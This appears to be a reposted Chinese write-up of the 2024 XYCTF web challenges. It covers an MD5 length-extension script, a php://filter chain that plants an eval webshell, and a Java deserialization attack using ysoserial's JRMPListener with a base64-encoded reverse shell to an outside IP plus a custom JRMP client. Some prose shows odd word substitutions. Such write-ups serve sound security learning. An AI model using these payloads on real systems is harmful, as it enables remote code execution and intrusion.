https://img-blog.csdnimg.cn/img_convert/f3e0dd7ed87497de6a7de4d28c25d0d3.png
但是如何判断flag的长度了?
完全可以根据平台特性是动态flag 位数是固定的43位，可以参考之前的flag 猜出来
注意提交的$value是%80%00%00%00%00%00%00%00%00%00%00%00%00X%01%00%00%00%00%00%001714025500去掉后缀的时间戳%80%00%00%00%00%00%00%00%00%00%00%00%00X%01%00%00%00%00%00%00
写个脚本不断请求
import requests

url='http://127.0.0.1:54572/?md5=c3512fdf01f911d012d043c8b39ed98e&value=%80%00%00%00%00%00%00%00%00%00%00%00%00X%01%00%00%00%00%00%00'

while True:

res=requests.get(url=url)

if "{" in res.text:

 print(res.text)

 break
https://img-blog.csdnimg.cn/img_convert/55d016b16c1878746203d247385d64a1.png
就可以直接拿到flag
法二: 当时写了个脚本做的（有网络延长time增加一点即可）
阅读项目源码原理,配合 hash-ext-attack项目调试即可
https://img-blog.csdnimg.cn/img_convert/2dc0f03a93cbb37f10873136247ed78f.png
import requests
import time
import sys
import urllib.parse
from loguru import logger
from common.HashExtAttack import HashExtAttack

hash_ext_attack = HashExtAttack()

logger.remove()

logger.add(sys.stderr, level="INFO")

initial_url = ''

while True:

for i in range(7,50):

 new_text_part, new_hash = hash_ext_attack.run('', '28aefeaefd98fd5a4b25cc913cd06484', '', i)

 quote = urllib.parse.quote(new_text_part, safe='&=')

 new_text_part2, new_hash2 = hash_ext_attack.run('', '28aefeaefd98fd5a4b25cc913cd06484', str(int(time.time())+1), i)

 url = f"{initial_url}/?md5={new_hash2}&value={quote}"

 response = requests.get(url=url)

 print(f"Time:+{int(time.time())}")

 text = response.text

 print(f"Response: {text}")

 if "{" in response.text:

 print(f"found Flag: {response.text}")

 break
ezLFI

考点: php filter chain+阅读dockerfile

在docker文件中设置权限题目
chmod 400 /flag只有文件所有者可以读取文件内容
存在/readflag阐明要实行shell命令
给了include_once();
没什么好说的一眼php filter chain构造任意字符,考点重复了?
用php_filter_chain天生一句话木马即可
精良的Github项目:
1.php_filter_chain_generator
https://github.com/synacktiv/php_filter_chain_generator
2.PHP_INCLUDE_TO_SHELL_CHAR_DICT:（提供了Fuzz脚本）
https://github.com/wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT
注意：以上项目只实现了构造目的字符串，字符集大概存在乱码，如果要构造明确的字符，需要了解根本原理
考法:

[*]文件包含直接rce(绕过include指定后缀或文件限制)
[*]构造任意字符过判断
注意一下：
如果服务器无响应阐明天生的php filter chain中有靶机系统不支持的字符集,换一个项目天生，注意一下，我这里用的是PHP_INCLUDE_TO_SHELL_CHAR_DICT项目
构造一句话木马<?php eval($_GET);?>
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.GBK.UTF-8|convert.iconv.IEC_P27-1.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1162.UTF32|convert.iconv.L4.T.61|convert.iconv.ISO6937.EUC-JP-MS|convert.iconv.EUCKR.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CN.ISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/etc/passwd
https://img-blog.csdnimg.cn/img_convert/ec80d816774f40cc7f11228e90af43b5.png
题目溯源:
1.hxp 2021 counter
2.2023极客大挑战 ezlfi
baby_unserialize

考点：Java反序列化+Jrmp绕过黑名单

发现反序列化的点
https://img-blog.csdnimg.cn/img_convert/843be7c10e6b1dc6baa8d60b9821abdb.png
URLDNS链验证
https://img-blog.csdnimg.cn/img_convert/4fb323897ee5c469eb41d6bb0836b158.png
阐明入口类 source Hashmap可用
该处存在Java反序化漏洞点，而且出网
welcome to this fantastic tool
Try this one
rO0ABXQAVklmIHlvdSBkZXNlcmlhbGl6ZSBtZSBkb3duLCBJIHNoYWxsIGJlY29tZSBtb3JlIHBvd2VyZnVsIHRoYW4geW91IGNhbiBwb3NzaWJseSBpbWFnaW5l(you deserialize me down, I shall become more powerful than you can possibly imagine)
{http://irrfzuahtu.dgrh3.cnhttp://irrfzuahtu.dgrh3.cn}
Fin!

直接打CC链，发现对payload base64解码后对关键词做了关键字过滤
TempleteImport 类被禁考虑绕过Sink实行
Error occurred: Class name not accepted: com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
黑盒审计:猜测情况中是更为通用性的 CC3.2版本
简单试了一下其他1,3,5,7,11,CCK1没有成功
这里可以逐一对恶意类的过滤探索
可以像拼图一样将Source,Gadget,Sink举行连接
在本地可以搭建情况用CodeQL辅助分析，但是是黑盒测试我们无法判断它具体是什么逻辑，大概花费的时间会特别多,这也不像新生赛会考的
以是我们换个思绪:
这里直接用Jrmp绕过黑名单限制
开个Jrmp恶意服务器做中心署理举行跳板绕过(类似二次反序列化)
用CC3 做恶意荷载
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections3 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNDguMTM1LjgyLjE5MC84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}'
https://img-blog.csdnimg.cn/img_convert/43ea04a394b93b372cb9c404652b88bc.png
本意是想直接用 ysoserial 举行 Client的配置
但是对yso天生的Client做了关键词过滤
以是直接写个Jrmp client端天生:
import sun.rmi.server.UnicastRef;
import sun.rmi.transport.LiveRef;
import sun.rmi.transport.tcp.TCPEndpoint;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.rmi.server.ObjID;
import java.rmi.server.RemoteObjectInvocationHandler;
import java.util.Base64;

public class Jrmp {
public static void main(String[] args) throws Exception {
 ObjID id = new ObjID();
 TCPEndpoint te = new TCPEndpoint("23.94.38.86", 12345);
 LiveRef liveRef = new LiveRef(id, te, false);
 UnicastRef ref = new UnicastRef(liveRef);
 RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref);

 ByteArrayOutputStream barr = new ByteArrayOutputStream();
 ObjectOutputStream oos = new ObjectOutputStream(barr);
 oos.writeObject(obj);
 oos.close();
 //Jrmp client to try try
 byte[] byteArray = barr.toByteArray();

 String res = Base64.getEncoder().encodeToString(byteArray);
 System.out.println(res);
 new ObjectInputStream(new ByteArrayInputStream(byteArray)).readObject();
}
}
https://img-blog.csdnimg.cn/img_convert/15c11fcde06c6092b1c4c80b5322c3cd.png
反弹shell后在情况变量中拿到flag
https://img-blog.csdnimg.cn/img_convert/ecf455c4ac5fbb837042ffbec8e35870.png
荣幸拿了一血

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。

页: [1]

qidao123.com技术社区-IT企服评测·应用市场's Archiver

2024 XYCTF Web 方向 wp 全解